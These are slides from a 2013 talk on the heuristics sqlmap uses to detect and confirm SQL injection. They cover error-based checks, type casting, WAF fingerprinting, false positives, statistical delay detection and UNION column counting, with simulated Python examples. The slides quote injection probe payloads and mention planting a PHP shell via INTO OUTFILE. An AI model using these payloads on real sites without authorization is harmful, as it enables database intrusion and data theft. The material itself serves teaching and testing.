These are the slides from a talk "Heuristic methods used in sqlmap" held at FSec 2013 conference (Croatia / Varazdin 19th September 2013) by Miroslav Stampar
Heuristic methods used in sqlmap
1. Heuristic methods used in sqlmap
Miroslav Štampar (dev@sqlmap.org)
2. FSec – FOI 2013, Varaždin (Croatia) September 19th, 2013 2
Heuristic method
Heuristic (/hjʉˈrɪstɨk/; Greek: “Εὑρίσκω”, “find” or “discover”)
Educational shortcuts to ease the cognitive load of making a decision
Speeding up the process of finding a satisfactory solution
Serve as an aid to learning, discovery and problem solving
Experimental and trial-and-error approach
Resulting in a solution which is not guaranteed to be optimal
3. Heuristic SQL injection checks (1)
In some cases DBMS error reporting is enabled
A deliberately invalid parameter value is sent (e.g. ())'"(''"'))
"SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version..."
Narrowing down tests to only those specific to the recognized/parsed DBMS
Automatically extending with DBMS-specific tests that would otherwise only be run at a higher --level
Switch --smart for finding targets in minutes
4. Heuristic SQL injection checks (2)
5. Heuristic SQL injection checks (3)
Particularly interesting cases are when a parameter contains an integer value (e.g. id=1)
Response changes when the value is changed (e.g. id=2)
Response is the same for an arithmetic operation resulting in the original value (e.g. id=1183-1182)
Warning the user that the processed parameter is most probably prone to SQL injection attack(s)
Making the user aware to persist in eventual further tests (to use higher --level/--risk and/or --tamper)
6. Heuristic SQL injection checks (4)
7. Heuristic SQL injection checks (5)
In cases when error reporting is turned off
At least one generic (i.e. non-DBMS-dependent) SQL injection technique is found
A single request per supported DBMS is sent
Using a form supported only by the targeted one (e.g. id=1 AND (SELECT 0x41597548)=0x41597548 for MySQL)
If the response is as expected, narrowing and/or expanding tests for the particular DBMS
8. Heuristic SQL injection checks (6)
9. Type casting detection (1)
In some cases (preventive) hard type casting (e.g. $id=intval($_REQUEST['id'])) is used
Especially noticeable on integer parameter values (e.g. id=1)
Different responses for different integer values (e.g. id=2)
Same response for appended random string values (e.g. id=1vHxr)
High probability that type casting is being used (hence, not exploitable)
Warning the user of a potentially futile run
10. Type casting detection (2)
11. FSec – FOI 2013, Varaždin (Croatia) September 19th, 2013 11
Length constraining detection (1)
Suhosin - popular open source PHP patch “...protecting servers and users from known and unknown flaws in PHP applications and PHP core...”
Constraining the length of request parameter values (e.g. GET values constrained to less than 512 chars)
Problematic when longer payloads are used (e.g. injecting a PHP shell through a SELECT..INTO OUTFILE statement)
Length constraining detection (2)
One lengthy payload containing a simple boolean question (e.g. id=1 AND 3182=...3182) is sent right after successful identification of SQL injection
WAF detection/fingerprinting (1)
Web Application Firewall (abbr. WAF) “...commonly used mechanism for prevention of malicious web application attacks...”
ModSecurity returns HTTP error code 501 on a detected attack
F5 BIG-IP adds its own X-Cnection HTTP header to the response
Generic detection (switch --check-waf)
Fingerprinting 28 different WAF products (switch --identify-waf)
Sending deliberately suspicious payloads and checking response(s) for unique characteristics
WAF detection/fingerprinting (2)
False positive detection (1)
“...term used for describing a result that indicates that a given condition is present when it is not...”
Another way of saying “mistake”
Giving a false sense of certainty while in reality there is nothing exploitable on the other side
Especially noticeable in boolean-based blind and time-based blind cases
Simple tests are done after the detection phase
Inspecting responses to predetermined boolean operations (e.g. id=1 AND 95>27)
False positive detection (2)
Delay detection (1)
Network latency (or lagging) is the main problem of the time-based blind technique
For example, if the deliberate delay used is 1 sec and normal response times are >0.5 and <2.0 secs, what can we conclude from a 1.5 sec response?
Also, how to recognize delays in hard queries (e.g. BENCHMARK(5000000,MD5('foobar')))?
Mathematical statistics to the rescue
A Gaussian bell-shaped curve for the normal distribution is calculated
Everything inside is considered “normal”, everything outside “not normal”
Delay detection (2)
Everything that's normal (i.e. not deliberately delayed) should fit under the curve
μ(t) represents the mean, while σ(t) represents the standard deviation of response times
99.99% of normal response times fall under the upper border value μ(t) + 7σ(t)
Delay detection (3)
sqlmap learns what's normal and what's not from non-delay-based payload responses (e.g. boolean-based blind)
Also, a few dummy requests are made if there is a need for more
Delay detection (4)
In case of considerable network latency the user is warned to use as high a delay value as possible
On the other hand, if latency is negligible, sqlmap optimizes the delay value (if applicable) to a more appropriate one
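The μ(t) + 7σ(t) band from "Delay detection (2)" and the delay advice on this slide, as an added Python example that is not sqlmap's code. The response-time samples are constructed, and MIN_SAMPLES, the function names and the exact advice rule (a delay must exceed the band width 7σ to stand out; with negligible latency 1 second suffices) are assumptions made for the example.

```python
import math
import statistics

STDEV_COEFF = 7     # upper border of "normal": mu(t) + 7*sigma(t), as on the slide
MIN_SAMPLES = 5     # assumption: smallest baseline worth fitting a curve to

# Constructed response-time samples (seconds), not measured data.
BASELINE = [0.6, 0.9, 1.4, 0.7, 1.9, 0.8, 1.1, 0.55, 1.7, 1.0]   # ">0.5 and <2.0"
FAST = [0.05, 0.06, 0.05, 0.07, 0.05]                              # negligible latency

def normal_band(times):
    """Fit the Gaussian to non-delayed response times: (mu, sigma, upper border)."""
    if len(times) < MIN_SAMPLES:
        raise ValueError("not enough baseline samples; send dummy requests first")
    mu = statistics.fmean(times)
    sigma = statistics.pstdev(times)
    return mu, sigma, mu + STDEV_COEFF * sigma

def is_delayed(elapsed, times):
    """A response is 'not normal' (deliberately delayed) when it exceeds the band."""
    return elapsed > normal_band(times)[2]

def advise_delay(times, delay):
    """Assumed decision rule for the requested delay (seconds).
    A delayed response lands near mu + delay, so it only stands out when the
    delay exceeds the band width 7*sigma; otherwise warn the user to use as
    high a delay as possible. With negligible latency, 1 second is enough."""
    mu, sigma, upper = normal_band(times)
    band = upper - mu
    if delay <= band:
        return ("warn", math.ceil(band) + 1)    # smallest delay that would stand out
    if upper < 1.0 and delay > 1:
        return ("optimize", 1)
    return ("ok", delay)
```

With the constructed baseline the 1.5 sec response from the earlier slide falls inside the band, so nothing can be concluded from it, and a 1 sec delay is reported as too short to be distinguishable.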
Finding number of query fields (1)
For successful usage of the UNION-based technique, the number of fields has to be known
The foremost method used is the ORDER BY clause
If the response for an arbitrarily large value (e.g. id=1 ORDER BY 9664#) drastically differs from the neutral one (e.g. id=1 ORDER BY 1#)
sqlmap uses an adapted (chunked) binary search
Finding number of query fields (2)
If the ORDER BY method is not usable, a similar approach is used as in delay detection
A constant field value (e.g. NULL) is used across the (current chunk of the) search space in a UNION ALL SELECT statement
Searching for the number of fields that, compared to the original response, “sticks out” from the others in a statistical manner
Responses for a non-valid number of fields will not differ much from each other
The response for the right number of fields will appear not normal compared to the others
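The statistical "sticks out" search described above, as an added Python example that is not sqlmap's code. It runs against a constructed SQLite-backed page whose error reporting is turned off, so every wrong field count renders the same empty page; the one-standard-deviation rule, max_cols and the helper names are assumptions made for the example.

```python
import sqlite3
import statistics
from difflib import SequenceMatcher

# Constructed in-memory target (not sqlmap code): a 3-column query whose
# failures are swallowed, so a wrong UNION column count yields an empty page.
_db = sqlite3.connect(":memory:")
_db.execute("CREATE TABLE items (id INTEGER, name TEXT, price REAL)")
_db.execute("INSERT INTO items VALUES (1, 'apple', 0.5)")

def page_for(value):
    """Simulated page rendering for ?id=<value> with error reporting off."""
    try:
        rows = _db.execute(
            f"SELECT id, name, price FROM items WHERE id={value}").fetchall()
    except sqlite3.Error:
        rows = []                       # silent failure: nothing rendered
    body = "".join("<tr>" + "".join(f"<td>{c}</td>" for c in r) + "</tr>"
                   for r in rows)
    return f"<html><body>{body}</body></html>"

def union_payload(base, n):
    """Constant NULL field values across the probed column count."""
    return f"{base} UNION ALL SELECT {','.join(['NULL'] * n)}--"

def find_column_count(page_for, base="1", max_cols=10):
    """Assumed rule: the count whose similarity to the original response lies
    outside mean +/- one standard deviation of all counts 'sticks out'.
    Returns None when nothing (or more than one count) stands out."""
    original = page_for(base)
    ratios = {n: SequenceMatcher(None, original,
                                 page_for(union_payload(base, n))).ratio()
              for n in range(1, max_cols + 1)}
    mu = statistics.fmean(ratios.values())
    sigma = statistics.pstdev(ratios.values())
    candidates = [n for n, r in ratios.items() if abs(r - mu) > sigma]
    return candidates[0] if len(candidates) == 1 else None
```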
Finding number of query fields (3)
Questions?